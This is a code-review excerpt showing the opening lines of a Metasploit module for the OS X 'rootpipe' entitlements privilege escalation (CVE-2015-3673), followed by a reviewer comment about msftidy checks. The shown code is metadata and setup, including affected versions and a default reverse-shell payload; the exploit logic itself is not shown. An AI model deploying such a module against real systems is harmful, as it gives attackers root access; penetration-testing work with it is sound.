modules/exploits/osx/local/rootpipe_entitlements.rb

```diff
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+
+  Rank = GreatRanking
+
+  include Msf::Post::OSX::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apple OS X Entitlements Rootpipe Privilege Escalation',
+      'Description'    => %q{
+        This module exploits the rootpipe vulnerability and bypasses Apple's initial
+        fix for the issue by injecting code into a process with the 'admin.writeconfig'
+        entitlement.
+      },
+      'Author'         => [
+        'Emil Kvarnhammar', # Vulnerability discovery and PoC
+        'joev'              # Copy/paste monkey
+      ],
+      'References'     => [
+        ['CVE',   '2015-3673'],
+        ['URL',   'https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again/']
+      ],
+      'DisclosureDate' => 'Jul 1 2015',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'osx',
+      'Arch'           => ARCH_X86_64,
+      'SessionTypes'   => ['shell'],
+      'Privileged'     => true,
+      'Targets'        => [
+        ['Mac OS X 10.9-10.10.3', {}]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'PAYLOAD'         => 'osx/x64/shell_reverse_tcp',
+        'PrependSetreuid' => true
+      }
+    ))
+
+    register_options([
+      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
```

Comment:
@wvu-r7 Blame HD :) I only came to know about this last Friday. IMO such guidelines should be part of the msftidy checks.